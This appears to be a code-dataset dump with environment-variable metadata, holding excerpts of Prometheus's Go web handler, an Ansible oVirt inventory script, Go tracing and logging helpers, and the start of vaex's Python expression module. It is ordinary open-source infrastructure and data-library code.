"{{$params := .Params}}",
"{{$path := .Path}}",
"{{$externalLabels := .ExternalLabels}}",
}
data := struct {
RawParams url.Values
Params map[string]string
Path string
ExternalLabels map[string]string
}{
RawParams: rawParams,
Params: params,
Path: strings.TrimLeft(name, "/"),
ExternalLabels: externalLabels,
}
tmpl := template.NewTemplateExpander(
ctx,
strings.Join(append(defs, string(text)), ""),
"__console_"+name,
data,
h.now(),
template.QueryFunc(rules.EngineQueryFunc(h.queryEngine, h.storage)),
h.options.ExternalURL,
)
filenames, err := filepath.Glob(h.options.ConsoleLibrariesPath + "/*.lib")
if err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
return
}
result, err := tmpl.ExpandHTML(filenames)
if err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
return
}
io.WriteString(w, result)
}
func (h *Handler) graph(w http.ResponseWriter, r *http.Request) {
h.executeTemplate(w, "graph.html", nil)
}
func (h *Handler) status(w http.ResponseWriter, r *http.Request) {
status := struct {
Birth time.Time
CWD string
Version *PrometheusVersion
Alertmanagers []*url.URL
GoroutineCount int
GOMAXPROCS int
GOGC string
GODEBUG string
CorruptionCount int64
ChunkCount int64
TimeSeriesCount int64
LastConfigTime time.Time
ReloadConfigSuccess bool
StorageRetention string
NumSeries uint64
MaxTime int64
MinTime int64
Stats *index.PostingsStats
Duration string
}{
Birth: h.birth,
CWD: h.cwd,
Version: h.versionInfo,
Alertmanagers: h.notifier.Alertmanagers(),
GoroutineCount: runtime.NumGoroutine(),
GOMAXPROCS: runtime.GOMAXPROCS(0),
GOGC: os.Getenv("GOGC"),
GODEBUG: os.Getenv("GODEBUG"),
}
if h.options.TSDBRetentionDuration != 0 {
status.StorageRetention = h.options.TSDBRetentionDuration.String()
}
if h.options.TSDBMaxBytes != 0 {
if status.StorageRetention != "" {
status.StorageRetention = status.StorageRetention + " or "
}
status.StorageRetention = status.StorageRetention + h.options.TSDBMaxBytes.String()
}
metrics, err := h.gatherer.Gather()
if err != nil {
http.Error(w, fmt.Sprintf("error gathering runtime status: %s", err), http.StatusInternalServerError)
return
}
for _, mF := range metrics {
switch *mF.Name {
case "prometheus_tsdb_head_chunks":
status.ChunkCount = int64(toFloat64(mF))
case "prometheus_tsdb_head_series":
status.TimeSeriesCount = int64(toFloat64(mF))
case "prometheus_tsdb_wal_corruptions_total":
status.CorruptionCount = int64(toFloat64(mF))
case "prometheus_config_last_reload_successful":
status.ReloadConfigSuccess = toFloat64(mF) != 0
case "prometheus_config_last_reload_success_timestamp_seconds":
status.LastConfigTime = time.Unix(int64(toFloat64(mF)), 0).UTC()
}
}
startTime := time.Now().UnixNano()
s, err := h.localStorage.Stats("__name__")
if err != nil {
if errors.Cause(err) == tsdb.ErrNotReady {
http.Error(w, tsdb.ErrNotReady.Error(), http.StatusServiceUnavailable)
return
}
http.Error(w, fmt.Sprintf("error gathering local storage statistics: %s", err), http.StatusInternalServerError)
return
}
status.Duration = fmt.Sprintf("%.3f", float64(time.Now().UnixNano()-startTime)/float64(1e9))
status.Stats = s.IndexPostingStats
status.NumSeries = s.NumSeries
status.MaxTime = s.MaxTime
status.MinTime = s.MinTime
h.executeTemplate(w, "status.html", status)
}
func (h *Handler) runtimeInfo() (api_v1.RuntimeInfo, error) {
status := api_v1.RuntimeInfo{
StartTime: h.birth,
CWD: h.cwd,
GoroutineCount: runtime.NumGoroutine(),
GOMAXPROCS: runtime.GOMAXPROCS(0),
GOGC: os.Getenv("GOGC"),
GODEBUG: os.Getenv("GODEBUG"),
}
if h.options.TSDBRetentionDuration != 0 {
status.StorageRetention = h.options.TSDBRetentionDuration.String()
}
if h.options.TSDBMaxBytes != 0 {
if status.StorageRetention != "" {
status.StorageRetention = status.StorageRetention + " or "
}
status.StorageRetention = status.StorageRetention + h.options.TSDBMaxBytes.String()
}
metrics, err := h.gatherer.Gather()
if err != nil {
return status, errors.Errorf("error gathering runtime status: %s", err)
}
for _, mF := range metrics {
switch *mF.Name {
case "prometheus_tsdb_wal_corruptions_total":
status.CorruptionCount = int64(toFloat64(mF))
case "prometheus_config_last_reload_successful":
status.ReloadConfigSuccess = toFloat64(mF) != 0
case "prometheus_config_last_reload_success_timestamp_seconds":
status.LastConfigTime = time.Unix(int64(toFloat64(mF)), 0).UTC()
}
}
return status, nil
}
func toFloat64(f *io_prometheus_client.MetricFamily) float64 {
m := *f.Metric[0]
if m.Gauge != nil {
return m.Gauge.GetValue()
}
if m.Counter != nil {
return m.Counter.GetValue()
}
if m.Untyped != nil {
return m.Untyped.GetValue()
}
return math.NaN()
}
func (h *Handler) flags(w http.ResponseWriter, r *http.Request) {
h.executeTemplate(w, "flags.html", h.flagsMap)
}
func (h *Handler) serveConfig(w http.ResponseWriter, r *http.Request) {
h.mtx.RLock()
defer h.mtx.RUnlock()
h.executeTemplate(w, "config.html", h.config.String())
}
func (h *Handler) rules(w http.ResponseWriter, r *http.Request) {
h.executeTemplate(w, "rules.html", h.ruleManager)
}
func (h *Handler) serviceDiscovery(w http.ResponseWriter, r *http.Request) {
var index []string
targets := h.scrapeManager.TargetsAll()
for job := range targets {
index = append(index, job)
}
sort.Strings(index)
scrapeConfigData := struct {
Index []string
Targets map[string][]*scrape.Target
Active []int
Dropped []int
Total []int
}{
Index: index,
Targets: make(map[string][]*scrape.Target),
Active: make([]int, len(index)),
Dropped: make([]int, len(index)),
Total: make([]int, len(index)),
}
for i, job := range scrapeConfigData.Index {
scrapeConfigData.Targets[job] = make([]*scrape.Target, 0, len(targets[job]))
scrapeConfigData.Total[i] = len(targets[job])
for _, target := range targets[job] {
// Do not display more than 100 dropped targets per job to avoid
// returning too much data to the clients.
if target.Labels().Len() == 0 {
scrapeConfigData.Dropped[i]++
if scrapeConfigData.Dropped[i] > 100 {
continue
}
} else {
scrapeConfigData.Active[i]++
}
scrapeConfigData.Targets[job] = append(scrapeConfigData.Targets[job], target)
}
}
h.executeTemplate(w, "service-discovery.html", scrapeConfigData)
}
func (h *Handler) targets(w http.ResponseWriter, r *http.Request) {
tps := h.scrapeManager.TargetsActive()
for _, targets := range tps {
sort.Slice(targets, func(i, j int) bool {
iJobLabel := targets[i].Labels().Get(model.JobLabel)
jJobLabel := targets[j].Labels().Get(model.JobLabel)
if iJobLabel == jJobLabel {
return targets[i].Labels().Get(model.InstanceLabel) < targets[j].Labels().Get(model.InstanceLabel)
}
return iJobLabel < jJobLabel
})
}
h.executeTemplate(w, "targets.html", struct {
TargetPools map[string][]*scrape.Target
}{
TargetPools: tps,
})
}
func (h *Handler) version(w http.ResponseWriter, r *http.Request) {
enc := json.NewEncoder(w)
if err := enc.Encode(h.versionInfo); err != nil {
http.Error(w, fmt.Sprintf("error encoding JSON: %s", err), http.StatusInternalServerError)
}
}
func (h *Handler) quit(w http.ResponseWriter, r *http.Request) {
var closed bool
h.quitOnce.Do(func() {
closed = true
close(h.quitCh)
fmt.Fprintf(w, "Requesting termination... Goodbye!")
})
if !closed {
fmt.Fprintf(w, "Termination already in progress.")
}
}
func (h *Handler) reload(w http.ResponseWriter, r *http.Request) {
rc := make(chan error)
h.reloadCh <- rc
if err := <-rc; err != nil {
http.Error(w, fmt.Sprintf("failed to reload config: %s", err), http.StatusInternalServerError)
}
}
func (h *Handler) consolesPath() string {
if _, err := os.Stat(h.options.ConsoleTemplatesPath + "/index.html"); !os.IsNotExist(err) {
return h.options.ExternalURL.Path + "/consoles/index.html"
}
if h.options.UserAssetsPath != "" {
if _, err := os.Stat(h.options.UserAssetsPath + "/index.html"); !os.IsNotExist(err) {
return h.options.ExternalURL.Path + "/user/index.html"
}
}
return ""
}
func tmplFuncs(consolesPath string, opts *Options) template_text.FuncMap {
return template_text.FuncMap{
"since": func(t time.Time) time.Duration {
return time.Since(t) / time.Millisecond * time.Millisecond
},
"unixToTime": func(i int64) time.Time {
t := time.Unix(i/int64(time.Microsecond), 0).UTC()
return t
},
"consolesPath": func() string { return consolesPath },
"pathPrefix": func() string { return opts.ExternalURL.Path },
"pageTitle": func() string { return opts.PageTitle },
"buildVersion": func() string { return opts.Version.Revision },
"globalURL": func(u *url.URL) *url.URL {
host, port, err := net.SplitHostPort(u.Host)
if err != nil {
return u
}
for _, lhr := range api_v1.LocalhostRepresentations {
if host == lhr {
_, ownPort, err := net.SplitHostPort(opts.ListenAddress)
if err != nil {
return u
}
if port == ownPort {
// Only in the case where the target is on localhost and its port is
// the same as the one we're listening on, we know for sure that
// we're monitoring our own process and that we need to change the
// scheme, hostname, and port to the externally reachable ones as
// well. We shouldn't need to touch the path at all, since if a
// path prefix is defined, the path under which we scrape ourselves
// should already contain the prefix.
u.Scheme = opts.ExternalURL.Scheme
u.Host = opts.ExternalURL.Host
} else {
// Otherwise, we only know that localhost is not reachable
// externally, so we replace only the hostname by the one in the
// external URL. It could be the wrong hostname for the service on
// this port, but it's still the best possible guess.
host, _, err := net.SplitHostPort(opts.ExternalURL.Host)
if err != nil {
return u
}
u.Host = host + ":" + port
}
break
}
}
return u
},
"numHealthy": func(pool []*scrape.Target) int {
alive := len(pool)
for _, p := range pool {
if p.Health() != scrape.HealthGood {
alive--
}
}
return alive
},
"targetHealthToClass": func(th scrape.TargetHealth) string {
switch th {
case scrape.HealthUnknown:
return "warning"
case scrape.HealthGood:
return "success"
default:
return "danger"
}
},
"ruleHealthToClass": func(rh rules.RuleHealth) string {
switch rh {
case rules.HealthUnknown:
return "warning"
case rules.HealthGood:
return "success"
default:
return "danger"
}
},
"alertStateToClass": func(as rules.AlertState) string {
switch as {
case rules.StateInactive:
return "success"
case rules.StatePending:
return "warning"
case rules.StateFiring:
return "danger"
default:
panic("unknown alert state")
}
},
}
}
func (h *Handler) getTemplate(name string) (string, error) {
var tmpl string
appendf := func(name string) error {
f, err := ui.Assets.Open(path.Join("/templates", name))
if err != nil {
return err
}
defer f.Close()
b, err := ioutil.ReadAll(f)
if err != nil {
return err
}
tmpl += string(b)
return nil
}
err := appendf("_base.html")
if err != nil {
return "", errors.Wrap(err, "error reading base template")
}
err = appendf(name)
if err != nil {
return "", errors.Wrapf(err, "error reading page template %s", name)
}
return tmpl, nil
}
func (h *Handler) executeTemplate(w http.ResponseWriter, name string, data interface{}) {
text, err := h.getTemplate(name)
if err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
}
tmpl := template.NewTemplateExpander(
h.context,
text,
name,
data,
h.now(),
template.QueryFunc(rules.EngineQueryFunc(h.queryEngine, h.storage)),
h.options.ExternalURL,
)
tmpl.Funcs(tmplFuncs(h.consolesPath(), h.options))
result, err := tmpl.ExpandHTML(nil)
if err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
return
}
io.WriteString(w, result)
}
// AlertStatus bundles alerting rules and the mapping of alert states to row classes.
type AlertStatus struct {
Groups []*rules.Group
AlertStateToRowClass map[rules.AlertState]string
Counts AlertByStateCount
}
type AlertByStateCount struct {
Inactive int32
Pending int32
Firing int32
}
func setPathWithPrefix(prefix string) func(handlerName string, handler http.HandlerFunc) http.HandlerFunc {
return func(handlerName string, handler http.HandlerFunc) http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
handler(w, r.WithContext(httputil.ContextWithPath(r.Context(), prefix+r.URL.Path)))
}
}
}
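// As a rough worked example (the host and path below are hypothetical, not taken from this
// file): if Prometheus sits behind a proxy with an external URL of https://example.org/prom,
// the route prefix derived from it is "/prom", and the routes registered in New() and Run()
// above resolve roughly as follows:
//
//   https://example.org/prom/              -> redirected to /prom/graph
//   https://example.org/prom/classic/graph -> h.graph (classic UI)
//   https://example.org/prom/api/v1/query  -> api_v1 router mounted in Run()
//   https://example.org/prom/metrics       -> promhttp.Handler()
//
// A request to the bare "/" is redirected to the route prefix itself, as set up at the top
// of New().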
|
[
"\"GOGC\"",
"\"GODEBUG\"",
"\"GOGC\"",
"\"GODEBUG\""
] |
[] |
[
"GOGC",
"GODEBUG"
] |
[]
|
["GOGC", "GODEBUG"]
|
go
| 2 | 0 | |
inventory/rhv/hosts/ovirt.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2016 Red Hat, Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
"""
oVirt dynamic inventory script
=================================
Generates a dynamic inventory for oVirt.
The script returns the following attributes for each virtual machine:
- id
- name
- host
- cluster
- status
- description
- fqdn
- os_type
- template
- tags
- statistics
- devices
When run in --list mode, virtual machines are grouped by the following categories:
- cluster
- tag
- status
Note: If a virtual machine has more than one tag, it will appear in each of the
corresponding tag groups.
Examples:
# Execute update of system on webserver virtual machine:
$ ansible -i contrib/inventory/ovirt4.py webserver -m yum -a "name=* state=latest"
# Get webserver virtual machine information:
$ contrib/inventory/ovirt4.py --host webserver
Author: Ondra Machacek (@machacekondra)
"""
import argparse
import os
import sys
from collections import defaultdict
try:
import ConfigParser as configparser
except ImportError:
import configparser
try:
import json
except ImportError:
import simplejson as json
try:
import ovirtsdk4 as sdk
import ovirtsdk4.types as otypes
except ImportError:
print('oVirt inventory script requires ovirt-engine-sdk-python >= 4.0.0')
sys.exit(1)
def parse_args():
"""
Create command line parser for oVirt dynamic inventory script.
"""
parser = argparse.ArgumentParser(
description='Ansible dynamic inventory script for oVirt.',
)
parser.add_argument(
'--list',
action='store_true',
default=True,
help='Get data of all virtual machines (default: True).',
)
parser.add_argument(
'--host',
help='Get data of the virtual machine with the specified name.',
)
parser.add_argument(
'--pretty',
action='store_true',
default=False,
help='Pretty format (default: False).',
)
return parser.parse_args()
def load_config_file():
# Get the path of the configuration file, by default use
# 'ovirt.ini' file in script directory:
default_path = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
'ovirt.ini',
)
config_path = os.environ.get('OVIRT_INI_PATH', default_path)
# Create parser and add ovirt section if it doesn't exist:
config = configparser.ConfigParser(
defaults={
'ovirt_url': '',
'ovirt_username': '',
'ovirt_password': '',
'ovirt_ca_file': '',
'vm_filter': '',
}
)
if not config.has_section('ovirt'):
config.add_section('ovirt')
config.read(config_path)
return config
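# For reference, a minimal 'ovirt.ini' matching the defaults above could look like the
# sketch below (URL, credentials and filter are placeholder values):
#
#   [ovirt]
#   ovirt_url = https://engine.example.com/ovirt-engine/api
#   ovirt_username = admin@internal
#   ovirt_password = secret
#   ovirt_ca_file = /path/to/ca.pem
#   vm_filter = status=up
#
# Note that this script only reads 'vm_filter' from the parsed config (in get_data() below);
# the connection settings themselves are taken from environment variables in
# create_connection().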
def create_connection():
"""
Create a connection to oVirt engine API.
"""
# Create a connection with options defined in ini file:
return sdk.Connection(
url=os.environ.get('OVIRT_API_URL'),
username=os.environ.get('OVIRT_USERNAME'),
password=os.environ.get('OVIRT_PASSWORD'),
ca_file=os.environ.get('OVIRT_CA_FILE'),
insecure=os.environ.get('OVIRT_CA_FILE') is None,
)
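# A hypothetical environment for create_connection() (all values are placeholders):
#
#   export OVIRT_API_URL=https://engine.example.com/ovirt-engine/api
#   export OVIRT_USERNAME=admin@internal
#   export OVIRT_PASSWORD=secret
#   export OVIRT_CA_FILE=/path/to/ca.pem    # when unset, the connection is made with insecure=True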
def get_dict_of_struct(connection, vm):
"""
Transform SDK Vm Struct type to Python dictionary.
"""
vms_service = connection.system_service().vms_service()
clusters_service = connection.system_service().clusters_service()
vm_service = vms_service.vm_service(vm.id)
devices = vm_service.reported_devices_service().list()
tags = vm_service.tags_service().list()
stats = vm_service.statistics_service().list()
labels = vm_service.affinity_labels_service().list()
groups = clusters_service.cluster_service(
vm.cluster.id
).affinity_groups_service().list()
return {
'openshift_hostname': vm.fqdn,
'ansible_host': vm.fqdn,
'id': vm.id,
'name': vm.name,
'host': connection.follow_link(vm.host).name if vm.host else None,
'cluster': connection.follow_link(vm.cluster).name,
'status': str(vm.status),
'description': vm.description,
'fqdn': vm.fqdn,
'os_type': vm.os.type,
'template': connection.follow_link(vm.template).name,
'tags': [tag.name for tag in tags],
'affinity_labels': [label.name for label in labels],
'affinity_groups': [
group.name for group in groups
if vm.name in [vm.name for vm in connection.follow_link(group.vms)]
],
# 'statistics': dict(
# (stat.name, stat.values[0].datum) for stat in stats
# ),
# 'devices': dict(
# (device.name, [ip.address for ip in device.ips]) for device in devices
# ),
# 'ansible_host': devices[0].ips[0].address if len(devices) > 0 else None,
}
def get_data(connection, vm_name=None):
"""
Obtain data of `vm_name` if specified, otherwise obtain data of all vms.
"""
vms_service = connection.system_service().vms_service()
clusters_service = connection.system_service().clusters_service()
config = load_config_file()
if vm_name:
vm = vms_service.list(search='name=%s' % vm_name) or [None]
data = get_dict_of_struct(
connection=connection,
vm=vm[0],
)
else:
vms = dict()
data = defaultdict(list)
vm_filter = config.get('ovirt', 'vm_filter')
for vm in vms_service.list(search='%s' % vm_filter):
name = vm.name
vm_service = vms_service.vm_service(vm.id)
cluster_service = clusters_service.cluster_service(vm.cluster.id)
# Add vm to vms dict:
vms[name] = get_dict_of_struct(connection, vm)
# Add vm to cluster group:
cluster_name = connection.follow_link(vm.cluster).name
data['cluster_%s' % cluster_name].append(name)
# Add vm to tag group:
tags_service = vm_service.tags_service()
for tag in tags_service.list():
# print tag.name
data['tag_Name_%s' % tag.name].append(name)
# Add vm to status group:
data['status_%s' % vm.status].append(name)
# Add vm to affinity group:
for group in cluster_service.affinity_groups_service().list():
if vm.name in [
v.name for v in connection.follow_link(group.vms)
]:
data['affinity_group_%s' % group.name].append(vm.name)
# Add vm to affinity label group:
affinity_labels_service = vm_service.affinity_labels_service()
for label in affinity_labels_service.list():
data['affinity_label_%s' % label.name].append(name)
data["_meta"] = {
'hostvars': vms,
}
return data
def main():
args = parse_args()
connection = create_connection()
print(
json.dumps(
obj=get_data(
connection=connection,
vm_name=args.host,
),
sort_keys=args.pretty,
indent=args.pretty * 2,
)
)
if __name__ == '__main__':
main()
|
[] |
[] |
[
"OVIRT_CA_FILE",
"OVIRT_PASSWORD",
"OVIRT_API_URL",
"OVIRT_USERNAME",
"OVIRT_INI_PATH"
] |
[]
|
["OVIRT_CA_FILE", "OVIRT_PASSWORD", "OVIRT_API_URL", "OVIRT_USERNAME", "OVIRT_INI_PATH"]
|
python
| 5 | 0 | |
utils/utils.go
|
package utils
import (
"context"
"net/http"
"os"
"strings"
"github.com/carousell/Orion/utils/log"
newrelic "github.com/newrelic/go-agent"
"go.elastic.co/apm"
)
const (
newRelicTransactionID = "NewRelicTransaction"
)
var (
// NewRelicApp is the reference for newrelic application
NewRelicApp newrelic.Application
)
//GetHostname returns the HOST environment variable, defaulting to "localhost" when unset
func GetHostname() string {
host := os.Getenv("HOST")
if host == "" {
host = "localhost"
}
log.Info(context.Background(), "HOST", host)
return host
}
//GetNewRelicTransactionFromContext fetches the new relic transaction that is stored in the context
func GetNewRelicTransactionFromContext(ctx context.Context) newrelic.Transaction {
t := ctx.Value(newRelicTransactionID)
if t != nil {
txn, ok := t.(newrelic.Transaction)
if ok {
return txn
}
}
return nil
}
//StoreNewRelicTransactionToContext stores a new relic transaction object to context
func StoreNewRelicTransactionToContext(ctx context.Context, t newrelic.Transaction) context.Context {
return context.WithValue(ctx, newRelicTransactionID, t)
}
//StartNRTransaction starts a new newrelic transaction
func StartNRTransaction(path string, ctx context.Context, req *http.Request, w http.ResponseWriter) context.Context {
if req == nil {
if !strings.HasPrefix(path, "/") {
path = "/" + path
}
req, _ = http.NewRequest("", path, nil)
}
if NewRelicApp != nil {
// check if transaction has been initialized
t := GetNewRelicTransactionFromContext(ctx)
if t == nil {
t := NewRelicApp.StartTransaction(path, w, req)
ctx = StoreNewRelicTransactionToContext(ctx, t)
}
}
// check if transaction has been initialized
tx := apm.TransactionFromContext(ctx)
if tx == nil {
tx := apm.DefaultTracer.StartTransaction(path, "request")
ctx = apm.ContextWithTransaction(ctx, tx)
}
return ctx
}
//FinishNRTransaction finishes an existing transaction
func FinishNRTransaction(ctx context.Context, err error) {
t := GetNewRelicTransactionFromContext(ctx)
if t != nil {
t.NoticeError(err)
t.End()
}
tx := apm.TransactionFromContext(ctx)
if tx != nil {
apm.CaptureError(ctx, err)
tx.End()
}
}
//IgnoreNRTransaction ignores this NR transaction and prevents it from being reported
func IgnoreNRTransaction(ctx context.Context) error {
t := GetNewRelicTransactionFromContext(ctx)
if t != nil {
return t.Ignore()
}
return nil
}
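// As a rough usage sketch (handleHello below is a hypothetical handler, not part of this
// package): start the transaction at the top of the request, defer finishing it, and pass
// the returned context to downstream code.
//
//	func handleHello(w http.ResponseWriter, r *http.Request) {
//		ctx := StartNRTransaction("/hello", r.Context(), r, w)
//		var err error
//		defer func() { FinishNRTransaction(ctx, err) }()
//		// ... handler work using ctx ...
//	}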
|
[
"\"HOST\""
] |
[] |
[
"HOST"
] |
[]
|
["HOST"]
|
go
| 1 | 0 | |
logging/pirriLogging.go
|
package logging
import (
"bytes"
"encoding/json"
"fmt"
"io"
"os"
"os/exec"
"strings"
"sync"
"time"
"github.com/b4b4r07/go-pipe"
"go.uber.org/zap/zapcore"
"go.uber.org/zap"
)
var instance *PirriLogger
var once sync.Once
// PirriLogger wraps a zap logger guarded by a mutex
type PirriLogger struct {
lock sync.Mutex
logger *zap.Logger
}
//Service returns the logging service singleton
func Service() *PirriLogger {
once.Do(func() {
instance = &PirriLogger{
lock: sync.Mutex{},
}
instance.init()
})
return instance
}
func (l *PirriLogger) init() {
rawJSON := []byte(`{
"level": "debug",
"encoding": "json",
"initialFields": {"application": "PirriGo"},
"encoderConfig": {
"messageKey": "message",
"levelKey": "level",
"levelEncoder": "lowercase"
}
}`)
var cfg zap.Config
if err := json.Unmarshal(rawJSON, &cfg); err != nil {
panic(err)
}
// cfg.EncoderConfig.TimeKey = "time"
cfg.EncoderConfig.StacktraceKey = "stacktrace"
cfg.ErrorOutputPaths = []string{os.Getenv("PIRRIGO_LOG_LOCATION")}
cfg.OutputPaths = []string{os.Getenv("PIRRIGO_LOG_LOCATION")}
logger, err := cfg.Build()
l.logger = logger
if err != nil {
panic(err)
}
}
// LogEvent logs events
func (l *PirriLogger) LogEvent(message string, fields ...zapcore.Field) {
if os.Getenv("PIRRIGO_LOG_LOCATION") != "" {
fmt.Println("EVENT: ", message)
defer l.logger.Sync()
defer l.lock.Unlock()
l.lock.Lock()
fields = append(
fields,
[]zapcore.Field{
zap.String("time", time.Now().Format(os.Getenv("PIRRIGO_DATE_FORMAT"))),
}...,
)
l.logger.Debug(
message,
fields...,
)
}
}
//LogError logs errors
func (l *PirriLogger) LogError(message string, fields ...zapcore.Field) {
defer l.logger.Sync()
defer l.lock.Unlock()
l.lock.Lock()
fields = append(
fields,
[]zapcore.Field{
zap.String("time", time.Now().Format(os.Getenv("PIRRIGO_DATE_FORMAT"))),
}...,
)
l.logger.Error(
message,
fields...,
)
}
// LoadJournalCtlLogs reads the PirriGo entries from journalctl and returns the matching lines in reverse order.
func (l *PirriLogger) LoadJournalCtlLogs() []string {
l.lock.Lock()
defer l.lock.Unlock()
var b bytes.Buffer
pipe.Command(&b,
exec.Command("journalctl", "-xe"),
exec.Command("grep", "pirrigo"),
)
io.Copy(os.Stdout, &b)
return reverseLogs(strings.Split(b.String(), "\n"))
}
func reverseLogs(s []string) []string {
i := 0
j := len(s) - 1
for i < j {
s[i], s[j] = s[j], s[i]
i++
j--
}
return s
}
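// A minimal usage sketch, assuming PIRRIGO_LOG_LOCATION and PIRRIGO_DATE_FORMAT are set
// before the first call (the path and layout below are placeholders):
//
//	os.Setenv("PIRRIGO_LOG_LOCATION", "/var/log/pirrigo.log")
//	os.Setenv("PIRRIGO_DATE_FORMAT", "2006-01-02 15:04:05")
//	logging.Service().LogEvent("station activated", zap.Int("station", 3))
//
// Service() builds the zap logger exactly once (sync.Once), so the environment must be in
// place before the first call to Service().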
|
[
"\"PIRRIGO_LOG_LOCATION\"",
"\"PIRRIGO_LOG_LOCATION\"",
"\"PIRRIGO_LOG_LOCATION\"",
"\"PIRRIGO_DATE_FORMAT\"",
"\"PIRRIGO_DATE_FORMAT\""
] |
[] |
[
"PIRRIGO_LOG_LOCATION",
"PIRRIGO_DATE_FORMAT"
] |
[]
|
["PIRRIGO_LOG_LOCATION", "PIRRIGO_DATE_FORMAT"]
|
go
| 2 | 0 | |
packages/vaex-core/vaex/expression.py
|
import ast
import copy
import os
import base64
import datetime
from pydoc import doc
import time
import cloudpickle as pickle
import functools
import operator
import six
import collections
import weakref
from future.utils import with_metaclass
import numpy as np
import pandas as pd
import tabulate
import pyarrow as pa
import vaex.hash
import vaex.serialize
from vaex.utils import _ensure_strings_from_expressions, _ensure_string_from_expression
from vaex.column import ColumnString, _to_string_sequence
from .hash import counter_type_from_dtype
from vaex.datatype import DataType
from vaex.docstrings import docsubst
from . import expresso
try:
from StringIO import StringIO
except ImportError:
from io import BytesIO as StringIO
try:
collectionsAbc = collections.abc
except AttributeError:
collectionsAbc = collections
# TODO: repeated from dataframe.py
default_shape = 128
PRINT_MAX_COUNT = 10
expression_namespace = {}
expression_namespace['nan'] = np.nan
_binary_ops = [
dict(code="+", name='add', op=operator.add),
dict(code="in", name='contains', op=operator.contains),
dict(code="/", name='truediv', op=operator.truediv),
dict(code="//", name='floordiv', op=operator.floordiv),
dict(code="&", name='and', op=operator.and_),
dict(code="^", name='xor', op=operator.xor),
dict(code="|", name='or', op=operator.or_),
dict(code="**", name='pow', op=operator.pow),
dict(code="is", name='is', op=operator.is_),
dict(code="is not", name='is_not', op=operator.is_not),
dict(code="<<", name='lshift', op=operator.lshift),
dict(code="%", name='mod', op=operator.mod),
dict(code="*", name='mul', op=operator.mul),
dict(code=">>", name='rshift', op=operator.rshift),
dict(code="-", name='sub', op=operator.sub),
dict(code="<", name='lt', op=operator.lt),
dict(code="<=", name='le', op=operator.le),
dict(code="==", name='eq', op=operator.eq),
dict(code="!=", name='ne', op=operator.ne),
dict(code=">=", name='ge', op=operator.ge),
dict(code=">", name='gt', op=operator.gt),
]
if hasattr(operator, 'div'):
_binary_ops.append(dict(code="/", name='div', op=operator.div))
if hasattr(operator, 'matmul'):
_binary_ops.append(dict(code="@", name='matmul', op=operator.matmul))
reversable = 'add sub mul matmul truediv floordiv mod divmod pow lshift rshift and xor or'.split()
_unary_ops = [
dict(code="~", name='invert', op=operator.invert),
dict(code="-", name='neg', op=operator.neg),
dict(code="+", name='pos', op=operator.pos),
]
class Meta(type):
def __new__(upperattr_metaclass, future_class_name,
future_class_parents, attrs):
# attrs = {}
for op in _binary_ops:
def wrap(op=op):
def f(a, b):
self = a
# print(op, a, b)
if isinstance(b, str) and self.dtype.is_datetime:
b = np.datetime64(b)
if self.df.is_category(self.expression) and self.df._future_behaviour and not isinstance(b, Expression):
labels = self.df.category_labels(self.expression)
if b not in labels:
raise ValueError(f'Value {b} not present in {labels}')
b = labels.index(b)
a = self.index_values()
try:
stringy = isinstance(b, str) or b.is_string()
except:
# this can happen when expression is a literal, like '1' (used in propagate_unc)
# which causes the dtype to fail
stringy = False
if stringy:
if isinstance(b, str):
b = repr(b)
if op['code'] == '==':
expression = 'str_equals({0}, {1})'.format(a.expression, b)
elif op['code'] == '!=':
expression = 'str_notequals({0}, {1})'.format(a.expression, b)
elif op['code'] == '+':
expression = 'str_cat({0}, {1})'.format(a.expression, b)
else:
raise ValueError('operand %r not supported for string comparison' % op['code'])
return Expression(self.ds, expression=expression)
else:
if isinstance(b, Expression):
assert b.ds == a.ds
b = b.expression
elif isinstance(b, (np.timedelta64)):
unit, step = np.datetime_data(b.dtype)
assert step == 1
b = b.astype(np.uint64).item()
b = f'scalar_timedelta({b}, {unit!r})'
elif isinstance(b, (np.datetime64)):
b = f'scalar_datetime("{b}")'
elif isinstance(b, np.ndarray) and b.ndim == 0 and vaex.dtype_of(b).is_datetime:
b = f'scalar_datetime("{b}")'
elif isinstance(b, np.ndarray) and b.ndim == 0 and vaex.dtype_of(b).is_timedelta:
unit, step = np.datetime_data(b.dtype)
assert step == 1
b = b.astype(np.uint64).item()
b = f'scalar_timedelta({b}, {unit!r})'
expression = '({0} {1} {2})'.format(a.expression, op['code'], b)
return Expression(self.ds, expression=expression)
attrs['__%s__' % op['name']] = f
if op['name'] in reversable:
def f(a, b):
self = a
if isinstance(b, str):
if op['code'] == '+':
expression = 'str_cat({1}, {0})'.format(a.expression, repr(b))
else:
raise ValueError('operand %r not supported for string comparison' % op['code'])
return Expression(self.ds, expression=expression)
else:
if isinstance(b, Expression):
assert b.ds == a.ds
b = b.expression
expression = '({2} {1} {0})'.format(a.expression, op['code'], b)
return Expression(self.ds, expression=expression)
attrs['__r%s__' % op['name']] = f
wrap(op)
for op in _unary_ops:
def wrap(op=op):
def f(a):
self = a
expression = '{0}({1})'.format(op['code'], a.expression)
return Expression(self.ds, expression=expression)
attrs['__%s__' % op['name']] = f
wrap(op)
return type(future_class_name, future_class_parents, attrs)
class DateTime(object):
"""DateTime operations
Usually accessed using e.g. `df.birthday.dt.dayofweek`
"""
def __init__(self, expression):
self.expression = expression
class TimeDelta(object):
"""TimeDelta operations
Usually accessed using e.g. `df.delay.td.days`
"""
def __init__(self, expression):
self.expression = expression
class StringOperations(object):
"""String operations.
Usually accessed using e.g. `df.name.str.lower()`
"""
def __init__(self, expression):
self.expression = expression
class StringOperationsPandas(object):
"""String operations using Pandas Series (much slower)"""
def __init__(self, expression):
self.expression = expression
class StructOperations(collections.abc.Mapping):
"""Struct Array operations.
Usually accessed using e.g. `df.name.struct.get('field1')`
"""
